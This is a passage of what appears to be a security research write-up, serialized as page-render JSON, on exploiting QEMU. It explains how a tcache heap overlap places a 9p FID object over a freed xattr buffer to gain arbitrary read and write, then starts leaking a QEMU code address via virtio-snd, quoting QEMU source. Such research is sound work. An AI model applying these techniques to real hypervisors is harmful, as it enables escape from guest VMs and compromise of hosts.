pe":27,"tag":207,"props":136948,"children":136949},{"style":238},[136950],{"type":33,"value":135730},{"type":27,"tag":207,"props":136952,"children":136953},{"class":209,"line":4249},[136954],{"type":27,"tag":207,"props":136955,"children":136956},{"emptyLinePlaceholder":19},[136957],{"type":33,"value":2062},{"type":27,"tag":207,"props":136959,"children":136960},{"class":209,"line":4290},[136961],{"type":27,"tag":207,"props":136962,"children":136963},{"style":238},[136964],{"type":33,"value":112006},{"type":27,"tag":36,"props":136966,"children":136967},{},[136968,136970,136976,136978,136983,136984,136989,136991,136996,136998,137004,137005,137011,137013,137018,137019,137024],{"type":33,"value":136969},"The important detail here is that an xattr FID stores both the backing pointer and its length inside the surrounding ",{"type":27,"tag":84,"props":136971,"children":136973},{"className":136972},[],[136974],{"type":33,"value":136975},"V9fsFidState",{"type":33,"value":136977}," object. In other words, if we can place a ",{"type":27,"tag":84,"props":136979,"children":136981},{"className":136980},[],[136982],{"type":33,"value":136975},{"type":33,"value":14604},{"type":27,"tag":84,"props":136985,"children":136987},{"className":136986},[],[136988],{"type":33,"value":136544},{"type":33,"value":136990}," currently sits, the overlapping ",{"type":27,"tag":84,"props":136992,"children":136994},{"className":136993},[],[136995],{"type":33,"value":136552},{"type":33,"value":136997}," chunk can overwrite ",{"type":27,"tag":84,"props":136999,"children":137001},{"className":137000},[],[137002],{"type":33,"value":137003},"V9fsFidState.fs.xattr.value",{"type":33,"value":1131},{"type":27,"tag":84,"props":137006,"children":137008},{"className":137007},[],[137009],{"type":33,"value":137010},"V9fsFidState.fs.xattr.len",{"type":33,"value":137012},". That would immediately give us arbitrary read and write through ",{"type":27,"tag":84,"props":137014,"children":137016},{"className":137015},[],[137017],{"type":33,"value":135806},{"type":33,"value":1131},{"type":27,"tag":84,"props":137020,"children":137022},{"className":137021},[],[137023],{"type":33,"value":135798},{"type":33,"value":1041},{"type":27,"tag":36,"props":137026,"children":137027},{},[137028,137030,137035,137036,137041,137043,137048,137050,137056,137058,137063,137065,137070,137072,137077,137079,137084,137086,137091],{"type":33,"value":137029},"At this point, ",{"type":27,"tag":84,"props":137031,"children":137033},{"className":137032},[],[137034],{"type":33,"value":136544},{"type":33,"value":22719},{"type":27,"tag":84,"props":137037,"children":137039},{"className":137038},[],[137040],{"type":33,"value":135013},{"type":33,"value":137042}," chunk, while ",{"type":27,"tag":84,"props":137044,"children":137046},{"className":137045},[],[137047],{"type":33,"value":136975},{"type":33,"value":137049}," falls into the ",{"type":27,"tag":84,"props":137051,"children":137053},{"className":137052},[],[137054],{"type":33,"value":137055},"0x120",{"type":33,"value":137057}," size class. Before freeing ",{"type":27,"tag":84,"props":137059,"children":137061},{"className":137060},[],[137062],{"type":33,"value":136544},{"type":33,"value":137064},", we therefore use the oversized ",{"type":27,"tag":84,"props":137066,"children":137068},{"className":137067},[],[137069],{"type":33,"value":136552},{"type":33,"value":137071}," chunk to change its size to match ",{"type":27,"tag":84,"props":137073,"children":137075},{"className":137074},[],[137076],{"type":33,"value":136975},{"type":33,"value":137078},". Once ",{"type":27,"tag":84,"props":137080,"children":137082},{"className":137081},[],[137083],{"type":33,"value":136544},{"type":33,"value":137085}," is freed, it is inserted into the ",{"type":27,"tag":84,"props":137087,"children":137089},{"className":137088},[],[137090],{"type":33,"value":137055},{"type":33,"value":137092}," tcache bin.",{"type":27,"tag":101,"props":137094,"children":137096},{"code":137095}," .value Y extended\n |\n+--------------------+--------------------+\n| |\n| Free |\nv 0x120 v\n+--------------------+---------------+----+\n| |...............| |\n| .value Y |...............| |\n| |...............| |\n+--------------------+---------------+----+\n",[137097],{"type":27,"tag":84,"props":137098,"children":137099},{"__ignoreMap":7},[137100],{"type":33,"value":137095},{"type":27,"tag":36,"props":137102,"children":137103},{},[137104,137106,137111,137113,137119,137121,137127,137129,137134],{"type":33,"value":137105},"After that, we can simply allocate a new ",{"type":27,"tag":84,"props":137107,"children":137109},{"className":137108},[],[137110],{"type":33,"value":136975},{"type":33,"value":137112}," with a ",{"type":27,"tag":84,"props":137114,"children":137116},{"className":137115},[],[137117],{"type":33,"value":137118},"P9_TWALK",{"type":33,"value":137120}," request and a fresh FID - this reaches ",{"type":27,"tag":84,"props":137122,"children":137124},{"className":137123},[],[137125],{"type":33,"value":137126},"alloc_fid",{"type":33,"value":137128},", which allocates a new ",{"type":27,"tag":84,"props":137130,"children":137132},{"className":137131},[],[137133],{"type":33,"value":136975},{"type":33,"value":736},{"type":27,"tag":101,"props":137136,"children":137138},{"code":137137,"language":10435,"meta":7,"className":23789,"style":7},"static void coroutine_fn v9fs_walk(void *opaque)\n{\n V9fsFidState *fidp;\n V9fsFidState *newfidp = NULL;\n\n [...]\n\n if (fid == newfid) {\n [...]\n } else {\n newfidp = alloc_fid(s, newfid);\n if (newfidp == NULL) {\n err = -EINVAL;\n goto out;\n }\n newfidp->uid = fidp->uid;\n v9fs_path_copy(&newfidp->path, &path);\n }\n\n [...]\n}\n\nstatic V9fsFidState *alloc_fid(V9fsState *s, int32_t fid)\n{\n V9fsFidState *f;\n\n f = g_hash_table_lookup(s->fids, GINT_TO_POINTER(fid));\n if (f) {\n /* If fid is already there return NULL */\n BUG_ON(f->clunked);\n return NULL;\n }\n f = g_new0(V9fsFidState, 1);\n\n [...]\n",[137139],{"type":27,"tag":84,"props":137140,"children":137141},{"__ignoreMap":7},[137142,137182,137189,137205,137233,137240,137247,137254,137275,137282,137297,137319,137343,137364,137375,137382,137420,137462,137469,137476,137483,137490,137497,137548,137555,137570,137577,137625,137637,137645,137674,137689,137696,137725,137732],{"type":27,"tag":207,"props":137143,"children":137144},{"class":209,"line":210},[137145,137149,137153,137157,137162,137166,137170,137174,137178],{"type":27,"tag":207,"props":137146,"children":137147},{"style":214},[137148],{"type":33,"value":58283},{"type":27,"tag":207,"props":137150,"children":137151},{"style":214},[137152],{"type":33,"value":58288},{"type":27,"tag":207,"props":137154,"children":137155},{"style":238},[137156],{"type":33,"value":135143},{"type":27,"tag":207,"props":137158,"children":137159},{"style":1335},[137160],{"type":33,"value":137161},"v9fs_walk",{"type":27,"tag":207,"props":137163,"children":137164},{"style":238},[137165],{"type":33,"value":1343},{"type":27,"tag":207,"props":137167,"children":137168},{"style":214},[137169],{"type":33,"value":58863},{"type":27,"tag":207,"props":137171,"children":137172},{"style":226},[137173],{"type":33,"value":17093},{"type":27,"tag":207,"props":137175,"children":137176},{"style":220},[137177],{"type":33,"value":135165},{"type":27,"tag":207,"props":137179,"children":137180},{"style":238},[137181],{"type":33,"value":10449},{"type":27,"tag":207,"props":137183,"children":137184},{"class":209,"line":244},[137185],{"type":27,"tag":207,"props":137186,"children":137187},{"style":238},[137188],{"type":33,"value":18158},{"type":27,"tag":207,"props":137190,"children":137191},{"class":209,"line":270},[137192,137196,137200],{"type":27,"tag":207,"props":137193,"children":137194},{"style":238},[137195],{"type":33,"value":135290},{"type":27,"tag":207,"props":137197,"children":137198},{"style":226},[137199],{"type":33,"value":9286},{"type":27,"tag":207,"props":137201,"children":137202},{"style":238},[137203],{"type":33,"value":137204},"fidp;\n",{"type":27,"tag":207,"props":137206,"children":137207},{"class":209,"line":296},[137208,137212,137216,137221,137225,137229],{"type":27,"tag":207,"props":137209,"children":137210},{"style":238},[137211],{"type":33,"value":135290},{"type":27,"tag":207,"props":137213,"children":137214},{"style":226},[137215],{"type":33,"value":9286},{"type":27,"tag":207,"props":137217,"children":137218},{"style":238},[137219],{"type":33,"value":137220},"newfidp ",{"type":27,"tag":207,"props":137222,"children":137223},{"style":226},[137224],{"type":33,"value":10380},{"type":27,"tag":207,"props":137226,"children":137227},{"style":214},[137228],{"type":33,"value":134969},{"type":27,"tag":207,"props":137230,"children":137231},{"style":238},[137232],{"type":33,"value":241},{"type":27,"tag":207,"props":137234,"children":137235},{"class":209,"line":445},[137236],{"type":27,"tag":207,"props":137237,"children":137238},{"emptyLinePlaceholder":19},[137239],{"type":33,"value":2062},{"type":27,"tag":207,"props":137241,"children":137242},{"class":209,"line":867},[137243],{"type":27,"tag":207,"props":137244,"children":137245},{"style":238},[137246],{"type":33,"value":112006},{"type":27,"tag":207,"props":137248,"children":137249},{"class":209,"line":892},[137250],{"type":27,"tag":207,"props":137251,"children":137252},{"emptyLinePlaceholder":19},[137253],{"type":33,"value":2062},{"type":27,"tag":207,"props":137255,"children":137256},{"class":209,"line":1475},[137257,137261,137266,137270],{"type":27,"tag":207,"props":137258,"children":137259},{"style":376},[137260],{"type":33,"value":19556},{"type":27,"tag":207,"props":137262,"children":137263},{"style":238},[137264],{"type":33,"value":137265}," (fid ",{"type":27,"tag":207,"props":137267,"children":137268},{"style":226},[137269],{"type":33,"value":15856},{"type":27,"tag":207,"props":137271,"children":137272},{"style":238},[137273],{"type":33,"value":137274}," newfid) {\n",{"type":27,"tag":207,"props":137276,"children":137277},{"class":209,"line":2065},[137278],{"type":27,"tag":207,"props":137279,"children":137280},{"style":238},[137281],{"type":33,"value":131241},{"type":27,"tag":207,"props":137283,"children":137284},{"class":209,"line":2092},[137285,137289,137293],{"type":27,"tag":207,"props":137286,"children":137287},{"style":238},[137288],{"type":33,"value":23054},{"type":27,"tag":207,"props":137290,"children":137291},{"style":376},[137292],{"type":33,"value":10605},{"type":27,"tag":207,"props":137294,"children":137295},{"style":238},[137296],{"type":33,"value":384},{"type":27,"tag":207,"props":137298,"children":137299},{"class":209,"line":2130},[137300,137305,137309,137314],{"type":27,"tag":207,"props":137301,"children":137302},{"style":238},[137303],{"type":33,"value":137304}," newfidp ",{"type":27,"tag":207,"props":137306,"children":137307},{"style":226},[137308],{"type":33,"value":10380},{"type":27,"tag":207,"props":137310,"children":137311},{"style":1335},[137312],{"type":33,"value":137313}," alloc_fid",{"type":27,"tag":207,"props":137315,"children":137316},{"style":238},[137317],{"type":33,"value":137318},"(s, newfid);\n",{"type":27,"tag":207,"props":137320,"children":137321},{"class":209,"line":2168},[137322,137326,137331,137335,137339],{"type":27,"tag":207,"props":137323,"children":137324},{"style":376},[137325],{"type":33,"value":10562},{"type":27,"tag":207,"props":137327,"children":137328},{"style":238},[137329],{"type":33,"value":137330}," (newfidp ",{"type":27,"tag":207,"props":137332,"children":137333},{"style":226},[137334],{"type":33,"value":15856},{"type":27,"tag":207,"props":137336,"children":137337},{"style":214},[137338],{"type":33,"value":134969},{"type":27,"tag":207,"props":137340,"children":137341},{"style":238},[137342],{"type":33,"value":1424},{"type":27,"tag":207,"props":137344,"children":137345},{"class":209,"line":4095},[137346,137351,137355,137359],{"type":27,"tag":207,"props":137347,"children":137348},{"style":238},[137349],{"type":33,"value":137350}," err ",{"type":27,"tag":207,"props":137352,"children":137353},{"style":226},[137354],{"type":33,"value":10380},{"type":27,"tag":207,"props":137356,"children":137357},{"style":226},[137358],{"type":33,"value":544},{"type":27,"tag":207,"props":137360,"children":137361},{"style":238},[137362],{"type":33,"value":137363},"EINVAL;\n",{"type":27,"tag":207,"props":137365,"children":137366},{"class":209,"line":4103},[137367,137371],{"type":27,"tag":207,"props":137368,"children":137369},{"style":376},[137370],{"type":33,"value":67781},{"type":27,"tag":207,"props":137372,"children":137373},{"style":238},[137374],{"type":33,"value":67786},{"type":27,"tag":207,"props":137376,"children":137377},{"class":209,"line":4154},[137378],{"type":27,"tag":207,"props":137379,"children":137380},{"style":238},[137381],{"type":33,"value":10637},{"type":27,"tag":207,"props":137383,"children":137384},{"class":209,"line":4203},[137385,137390,137394,137399,137403,137408,137412,137416],{"type":27,"tag":207,"props":137386,"children":137387},{"style":220},[137388],{"type":33,"value":137389}," newfidp",{"type":27,"tag":207,"props":137391,"children":137392},{"style":238},[137393],{"type":33,"value":8968},{"type":27,"tag":207,"props":137395,"children":137396},{"style":220},[137397],{"type":33,"value":137398},"uid",{"type":27,"tag":207,"props":137400,"children":137401},{"style":226},[137402],{"type":33,"value":229},{"type":27,"tag":207,"props":137404,"children":137405},{"style":220},[137406],{"type":33,"value":137407}," fidp",{"type":27,"tag":207,"props":137409,"children":137410},{"style":238},[137411],{"type":33,"value":8968},{"type":27,"tag":207,"props":137413,"children":137414},{"style":220},[137415],{"type":33,"value":137398},{"type":27,"tag":207,"props":137417,"children":137418},{"style":238},[137419],{"type":33,"value":241},{"type":27,"tag":207,"props":137421,"children":137422},{"class":209,"line":4249},[137423,137428,137432,137436,137441,137445,137449,137453,137457],{"type":27,"tag":207,"props":137424,"children":137425},{"style":1335},[137426],{"type":33,"value":137427}," v9fs_path_copy",{"type":27,"tag":207,"props":137429,"children":137430},{"style":238},[137431],{"type":33,"value":1343},{"type":27,"tag":207,"props":137433,"children":137434},{"style":226},[137435],{"type":33,"value":10398},{"type":27,"tag":207,"props":137437,"children":137438},{"style":220},[137439],{"type":33,"value":137440},"newfidp",{"type":27,"tag":207,"props":137442,"children":137443},{"style":238},[137444],{"type":33,"value":8968},{"type":27,"tag":207,"props":137446,"children":137447},{"style":220},[137448],{"type":33,"value":119528},{"type":27,"tag":207,"props":137450,"children":137451},{"style":238},[137452],{"type":33,"value":1123},{"type":27,"tag":207,"props":137454,"children":137455},{"style":226},[137456],{"type":33,"value":10398},{"type":27,"tag":207,"props":137458,"children":137459},{"style":238},[137460],{"type":33,"value":137461},"path);\n",{"type":27,"tag":207,"props":137463,"children":137464},{"class":209,"line":4290},[137465],{"type":27,"tag":207,"props":137466,"children":137467},{"style":238},[137468],{"type":33,"value":10645},{"type":27,"tag":207,"props":137470,"children":137471},{"class":209,"line":4304},[137472],{"type":27,"tag":207,"props":137473,"children":137474},{"emptyLinePlaceholder":19},[137475],{"type":33,"value":2062},{"type":27,"tag":207,"props":137477,"children":137478},{"class":209,"line":5466},[137479],{"type":27,"tag":207,"props":137480,"children":137481},{"style":238},[137482],{"type":33,"value":112006},{"type":27,"tag":207,"props":137484,"children":137485},{"class":209,"line":5530},[137486],{"type":27,"tag":207,"props":137487,"children":137488},{"style":238},[137489],{"type":33,"value":451},{"type":27,"tag":207,"props":137491,"children":137492},{"class":209,"line":7900},[137493],{"type":27,"tag":207,"props":137494,"children":137495},{"emptyLinePlaceholder":19},[137496],{"type":33,"value":2062},{"type":27,"tag":207,"props":137498,"children":137499},{"class":209,"line":7909},[137500,137504,137509,137513,137517,137522,137526,137530,137534,137539,137544],{"type":27,"tag":207,"props":137501,"children":137502},{"style":214},[137503],{"type":33,"value":58283},{"type":27,"tag":207,"props":137505,"children":137506},{"style":238},[137507],{"type":33,"value":137508}," V9fsFidState ",{"type":27,"tag":207,"props":137510,"children":137511},{"style":226},[137512],{"type":33,"value":9286},{"type":27,"tag":207,"props":137514,"children":137515},{"style":1335},[137516],{"type":33,"value":137126},{"type":27,"tag":207,"props":137518,"children":137519},{"style":238},[137520],{"type":33,"value":137521},"(V9fsState ",{"type":27,"tag":207,"props":137523,"children":137524},{"style":226},[137525],{"type":33,"value":9286},{"type":27,"tag":207,"props":137527,"children":137528},{"style":220},[137529],{"type":33,"value":17929},{"type":27,"tag":207,"props":137531,"children":137532},{"style":238},[137533],{"type":33,"value":1123},{"type":27,"tag":207,"props":137535,"children":137536},{"style":214},[137537],{"type":33,"value":137538},"int32_t",{"type":27,"tag":207,"props":137540,"children":137541},{"style":220},[137542],{"type":33,"value":137543}," fid",{"type":27,"tag":207,"props":137545,"children":137546},{"style":238},[137547],{"type":33,"value":10449},{"type":27,"tag":207,"props":137549,"children":137550},{"class":209,"line":7917},[137551],{"type":27,"tag":207,"props":137552,"children":137553},{"style":238},[137554],{"type":33,"value":18158},{"type":27,"tag":207,"props":137556,"children":137557},{"class":209,"line":7926},[137558,137562,137566],{"type":27,"tag":207,"props":137559,"children":137560},{"style":238},[137561],{"type":33,"value":135290},{"type":27,"tag":207,"props":137563,"children":137564},{"style":226},[137565],{"type":33,"value":9286},{"type":27,"tag":207,"props":137567,"children":137568},{"style":238},[137569],{"type":33,"value":58404},{"type":27,"tag":207,"props":137571,"children":137572},{"class":209,"line":7934},[137573],{"type":27,"tag":207,"props":137574,"children":137575},{"emptyLinePlaceholder":19},[137576],{"type":33,"value":2062},{"type":27,"tag":207,"props":137578,"children":137579},{"class":209,"line":7943},[137580,137585,137589,137594,137598,137602,137606,137611,137615,137620],{"type":27,"tag":207,"props":137581,"children":137582},{"style":238},[137583],{"type":33,"value":137584}," f ",{"type":27,"tag":207,"props":137586,"children":137587},{"style":226},[137588],{"type":33,"value":10380},{"type":27,"tag":207,"props":137590,"children":137591},{"style":1335},[137592],{"type":33,"value":137593}," g_hash_table_lookup",{"type":27,"tag":207,"props":137595,"children":137596},{"style":238},[137597],{"type":33,"value":1343},{"type":27,"tag":207,"props":137599,"children":137600},{"style":220},[137601],{"type":33,"value":17929},{"type":27,"tag":207,"props":137603,"children":137604},{"style":238},[137605],{"type":33,"value":8968},{"type":27,"tag":207,"props":137607,"children":137608},{"style":220},[137609],{"type":33,"value":137610},"fids",{"type":27,"tag":207,"props":137612,"children":137613},{"style":238},[137614],{"type":33,"value":1123},{"type":27,"tag":207,"props":137616,"children":137617},{"style":1335},[137618],{"type":33,"value":137619},"GINT_TO_POINTER",{"type":27,"tag":207,"props":137621,"children":137622},{"style":238},[137623],{"type":33,"value":137624},"(fid));\n",{"type":27,"tag":207,"props":137626,"children":137627},{"class":209,"line":7952},[137628,137632],{"type":27,"tag":207,"props":137629,"children":137630},{"style":376},[137631],{"type":33,"value":19556},{"type":27,"tag":207,"props":137633,"children":137634},{"style":238},[137635],{"type":33,"value":137636}," (f) {\n",{"type":27,"tag":207,"props":137638,"children":137639},{"class":209,"line":7961},[137640],{"type":27,"tag":207,"props":137641,"children":137642},{"style":4647},[137643],{"type":33,"value":137644}," /* If fid is already there return NULL */\n",{"type":27,"tag":207,"props":137646,"children":137647},{"class":209,"line":7969},[137648,137653,137657,137661,137665,137670],{"type":27,"tag":207,"props":137649,"children":137650},{"style":1335},[137651],{"type":33,"value":137652}," BUG_ON",{"type":27,"tag":207,"props":137654,"children":137655},{"style":238},[137656],{"type":33,"value":1343},{"type":27,"tag":207,"props":137658,"children":137659},{"style":220},[137660],{"type":33,"value":7596},{"type":27,"tag":207,"props":137662,"children":137663},{"style":238},[137664],{"type":33,"value":8968},{"type":27,"tag":207,"props":137666,"children":137667},{"style":220},[137668],{"type":33,"value":137669},"clunked",{"type":27,"tag":207,"props":137671,"children":137672},{"style":238},[137673],{"type":33,"value":1455},{"type":27,"tag":207,"props":137675,"children":137676},{"class":209,"line":7978},[137677,137681,137685],{"type":27,"tag":207,"props":137678,"children":137679},{"style":376},[137680],{"type":33,"value":23019},{"type":27,"tag":207,"props":137682,"children":137683},{"style":214},[137684],{"type":33,"value":134969},{"type":27,"tag":207,"props":137686,"children":137687},{"style":238},[137688],{"type":33,"value":241},{"type":27,"tag":207,"props":137690,"children":137691},{"class":209,"line":7987},[137692],{"type":27,"tag":207,"props":137693,"children":137694},{"style":238},[137695],{"type":33,"value":10645},{"type":27,"tag":207,"props":137697,"children":137698},{"class":209,"line":7996},[137699,137703,137707,137712,137717,137721],{"type":27,"tag":207,"props":137700,"children":137701},{"style":238},[137702],{"type":33,"value":137584},{"type":27,"tag":207,"props":137704,"children":137705},{"style":226},[137706],{"type":33,"value":10380},{"type":27,"tag":207,"props":137708,"children":137709},{"style":1335},[137710],{"type":33,"value":137711}," g_new0",{"type":27,"tag":207,"props":137713,"children":137714},{"style":238},[137715],{"type":33,"value":137716},"(V9fsFidState, ",{"type":27,"tag":207,"props":137718,"children":137719},{"style":232},[137720],{"type":33,"value":1651},{"type":27,"tag":207,"props":137722,"children":137723},{"style":238},[137724],{"type":33,"value":1455},{"type":27,"tag":207,"props":137726,"children":137727},{"class":209,"line":8005},[137728],{"type":27,"tag":207,"props":137729,"children":137730},{"emptyLinePlaceholder":19},[137731],{"type":33,"value":2062},{"type":27,"tag":207,"props":137733,"children":137734},{"class":209,"line":8013},[137735],{"type":27,"tag":207,"props":137736,"children":137737},{"style":238},[137738],{"type":33,"value":112006},{"type":27,"tag":36,"props":137740,"children":137741},{},[137742,137744,137749],{"type":33,"value":137743},"After it is allocated, it will be placed into that freed region in place of the old ",{"type":27,"tag":84,"props":137745,"children":137747},{"className":137746},[],[137748],{"type":33,"value":136544},{"type":33,"value":135881},{"type":27,"tag":101,"props":137751,"children":137753},{"code":137752}," .value Y extended\n |\n+--------------------+--------------------+\n| |\n| |\nv v\n+--------------------+---------------+----+\n| | |....|\n| .value Y | V9fsFidState |....|\n| | |....|\n+--------------------+---------------+----+\n",[137754],{"type":27,"tag":84,"props":137755,"children":137756},{"__ignoreMap":7},[137757],{"type":33,"value":137752},{"type":27,"tag":26163,"props":137759,"children":137761},{"id":137760},"leaking-a-qemu-address",[137762],{"type":33,"value":137763},"Leaking a QEMU Address",{"type":27,"tag":36,"props":137765,"children":137766},{},[137767],{"type":33,"value":137768},"We now have an arbitrary read/write primitive and a controlled chunk at a known address. The next step is to leak a QEMU code address so we can later redirect execution. To do this, we combine the arbitrary read primitive with the known-address chunk: we free that chunk, replace it with an object that contains pointers into QEMU's code or data, and then use arbitrary read to leak its fields.",{"type":27,"tag":36,"props":137770,"children":137771},{},[137772,137774,137779],{"type":33,"value":137773},"For this, we go back to virtio-snd and its buffer allocations. Recall ",{"type":27,"tag":84,"props":137775,"children":137777},{"className":137776},[],[137778],{"type":33,"value":130967},{"type":33,"value":736},{"type":27,"tag":101,"props":137781,"children":137783},{"code":137782,"language":10435,"meta":7,"className":23789,"style":7},"static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n VirtIOSound *vsnd = VIRTIO_SND(vdev);\n VirtIOSoundPCMBuffer *buffer;\n VirtQueueElement *elem;\n size_t msg_sz, size;\n uint32_t stream_id;\n\n [...]\n\n for (;;) {\n VirtIOSoundPCMStream *stream;\n\n elem = virtqueue_pop(vq, sizeof(VirtQueueElement));\n if (!elem) {\n break;\n }\n /* get the message hdr object */\n msg_sz = iov_to_buf(elem->out_sg,\n elem->out_num,\n 0,\n &hdr,\n sizeof(virtio_snd_pcm_xfer));\n if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {\n goto rx_err;\n }\n stream_id = le32_to_cpu(hdr.stream_id);\n\n [...]\n\n WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n size = iov_size(elem->in_sg, elem->in_num) -\n sizeof(virtio_snd_pcm_status);\n buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size); // [1]\n buffer->elem = elem;\n buffer->vq = vq; // [2]\n buffer->size = 0;\n buffer->offset = 0;\n QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);\n }\n",[137784],{"type":27,"tag":84,"props":137785,"children":137786},{"__ignoreMap":7},[137787,137830,137837,137868,137883,137898,137910,137923,137930,137937,137944,137955,137970,137977,138005,138024,138035,138042,138050,138087,138108,138120,138133,138146,138172,138184,138191,138229,138236,138243,138250,138281,138336,138348,138389,138412,138441,138468,138495,138527],{"type":27,"tag":207,"props":137788,"children":137789},{"class":209,"line":210},[137790,137794,137798,137802,137806,137810,137814,137818,137822,137826],{"type":27,"tag":207,"props":137791,"children":137792},{"style":214},[137793],{"type":33,"value":58283},{"type":27,"tag":207,"props":137795,"children":137796},{"style":214},[137797],{"type":33,"value":58288},{"type":27,"tag":207,"props":137799,"children":137800},{"style":1335},[137801],{"type":33,"value":131046},{"type":27,"tag":207,"props":137803,"children":137804},{"style":238},[137805],{"type":33,"value":131051},{"type":27,"tag":207,"props":137807,"children":137808},{"style":226},[137809],{"type":33,"value":9286},{"type":27,"tag":207,"props":137811,"children":137812},{"style":220},[137813],{"type":33,"value":131060},{"type":27,"tag":207,"props":137815,"children":137816},{"style":238},[137817],{"type":33,"value":131065},{"type":27,"tag":207,"props":137819,"children":137820},{"style":226},[137821],{"type":33,"value":9286},{"type":27,"tag":207,"props":137823,"children":137824},{"style":220},[137825],{"type":33,"value":131074},{"type":27,"tag":207,"props":137827,"children":137828},{"style":238},[137829],{"type":33,"value":10449},{"type":27,"tag":207,"props":137831,"children":137832},{"class":209,"line":244},[137833],{"type":27,"tag":207,"props":137834,"children":137835},{"style":238},[137836],{"type":33,"value":18158},{"type":27,"tag":207,"props":137838,"children":137839},{"class":209,"line":270},[137840,137845,137849,137854,137858,137863],{"type":27,"tag":207,"props":137841,"children":137842},{"style":238},[137843],{"type":33,"value":137844}," VirtIOSound ",{"type":27,"tag":207,"props":137846,"children":137847},{"style":226},[137848],{"type":33,"value":9286},{"type":27,"tag":207,"props":137850,"children":137851},{"style":238},[137852],{"type":33,"value":137853},"vsnd ",{"type":27,"tag":207,"props":137855,"children":137856},{"style":226},[137857],{"type":33,"value":10380},{"type":27,"tag":207,"props":137859,"children":137860},{"style":1335},[137861],{"type":33,"value":137862}," VIRTIO_SND",{"type":27,"tag":207,"props":137864,"children":137865},{"style":238},[137866],{"type":33,"value":137867},"(vdev);\n",{"type":27,"tag":207,"props":137869,"children":137870},{"class":209,"line":296},[137871,137875,137879],{"type":27,"tag":207,"props":137872,"children":137873},{"style":238},[137874],{"type":33,"value":132064},{"type":27,"tag":207,"props":137876,"children":137877},{"style":226},[137878],{"type":33,"value":9286},{"type":27,"tag":207,"props":137880,"children":137881},{"style":238},[137882],{"type":33,"value":132073},{"type":27,"tag":207,"props":137884,"children":137885},{"class":209,"line":445},[137886,137890,137894],{"type":27,"tag":207,"props":137887,"children":137888},{"style":238},[137889],{"type":33,"value":131093},{"type":27,"tag":207,"props":137891,"children":137892},{"style":226},[137893],{"type":33,"value":9286},{"type":27,"tag":207,"props":137895,"children":137896},{"style":238},[137897],{"type":33,"value":131102},{"type":27,"tag":207,"props":137899,"children":137900},{"class":209,"line":867},[137901,137905],{"type":27,"tag":207,"props":137902,"children":137903},{"style":214},[137904],{"type":33,"value":23839},{"type":27,"tag":207,"props":137906,"children":137907},{"style":238},[137908],{"type":33,"value":137909}," msg_sz, size;\n",{"type":27,"tag":207,"props":137911,"children":137912},{"class":209,"line":892},[137913,137918],{"type":27,"tag":207,"props":137914,"children":137915},{"style":214},[137916],{"type":33,"value":137917}," uint32_t",{"type":27,"tag":207,"props":137919,"children":137920},{"style":238},[137921],{"type":33,"value":137922}," stream_id;\n",{"type":27,"tag":207,"props":137924,"children":137925},{"class":209,"line":1475},[137926],{"type":27,"tag":207,"props":137927,"children":137928},{"emptyLinePlaceholder":19},[137929],{"type":33,"value":2062},{"type":27,"tag":207,"props":137931,"children":137932},{"class":209,"line":2065},[137933],{"type":27,"tag":207,"props":137934,"children":137935},{"style":238},[137936],{"type":33,"value":112006},{"type":27,"tag":207,"props":137938,"children":137939},{"class":209,"line":2092},[137940],{"type":27,"tag":207,"props":137941,"children":137942},{"emptyLinePlaceholder":19},[137943],{"type":33,"value":2062},{"type":27,"tag":207,"props":137945,"children":137946},{"class":209,"line":2130},[137947,137951],{"type":27,"tag":207,"props":137948,"children":137949},{"style":376},[137950],{"type":33,"value":10321},{"type":27,"tag":207,"props":137952,"children":137953},{"style":238},[137954],{"type":33,"value":131128},{"type":27,"tag":207,"props":137956,"children":137957},{"class":209,"line":2168},[137958,137962,137966],{"type":27,"tag":207,"props":137959,"children":137960},{"style":238},[137961],{"type":33,"value":131136},{"type":27,"tag":207,"props":137963,"children":137964},{"style":226},[137965],{"type":33,"value":9286},{"type":27,"tag":207,"props":137967,"children":137968},{"style":238},[137969],{"type":33,"value":131145},{"type":27,"tag":207,"props":137971,"children":137972},{"class":209,"line":4095},[137973],{"type":27,"tag":207,"props":137974,"children":137975},{"emptyLinePlaceholder":19},[137976],{"type":33,"value":2062},{"type":27,"tag":207,"props":137978,"children":137979},{"class":209,"line":4103},[137980,137984,137988,137992,137996,138000],{"type":27,"tag":207,"props":137981,"children":137982},{"style":238},[137983],{"type":33,"value":131160},{"type":27,"tag":207,"props":137985,"children":137986},{"style":226},[137987],{"type":33,"value":10380},{"type":27,"tag":207,"props":137989,"children":137990},{"style":1335},[137991],{"type":33,"value":131169},{"type":27,"tag":207,"props":137993,"children":137994},{"style":238},[137995],{"type":33,"value":131174},{"type":27,"tag":207,"props":137997,"children":137998},{"style":214},[137999],{"type":33,"value":62563},{"type":27,"tag":207,"props":138001,"children":138002},{"style":238},[138003],{"type":33,"value":138004},"(VirtQueueElement));\n",{"type":27,"tag":207,"props":138006,"children":138007},{"class":209,"line":4154},[138008,138012,138016,138020],{"type":27,"tag":207,"props":138009,"children":138010},{"style":376},[138011],{"type":33,"value":10562},{"type":27,"tag":207,"props":138013,"children":138014},{"style":238},[138015],{"type":33,"value":686},{"type":27,"tag":207,"props":138017,"children":138018},{"style":226},[138019],{"type":33,"value":27893},{"type":27,"tag":207,"props":138021,"children":138022},{"style":238},[138023],{"type":33,"value":131208},{"type":27,"tag":207,"props":138025,"children":138026},{"class":209,"line":4203},[138027,138031],{"type":27,"tag":207,"props":138028,"children":138029},{"style":376},[138030],{"type":33,"value":10588},{"type":27,"tag":207,"props":138032,"children":138033},{"style":238},[138034],{"type":33,"value":241},{"type":27,"tag":207,"props":138036,"children":138037},{"class":209,"line":4249},[138038],{"type":27,"tag":207,"props":138039,"children":138040},{"style":238},[138041],{"type":33,"value":10637},{"type":27,"tag":207,"props":138043,"children":138044},{"class":209,"line":4290},[138045],{"type":27,"tag":207,"props":138046,"children":138047},{"style":4647},[138048],{"type":33,"value":138049}," /* get the message hdr object */\n",{"type":27,"tag":207,"props":138051,"children":138052},{"class":209,"line":4304},[138053,138058,138062,138067,138071,138075,138079,138083],{"type":27,"tag":207,"props":138054,"children":138055},{"style":238},[138056],{"type":33,"value":138057}," msg_sz ",{"type":27,"tag":207,"props":138059,"children":138060},{"style":226},[138061],{"type":33,"value":10380},{"type":27,"tag":207,"props":138063,"children":138064},{"style":1335},[138065],{"type":33,"value":138066}," 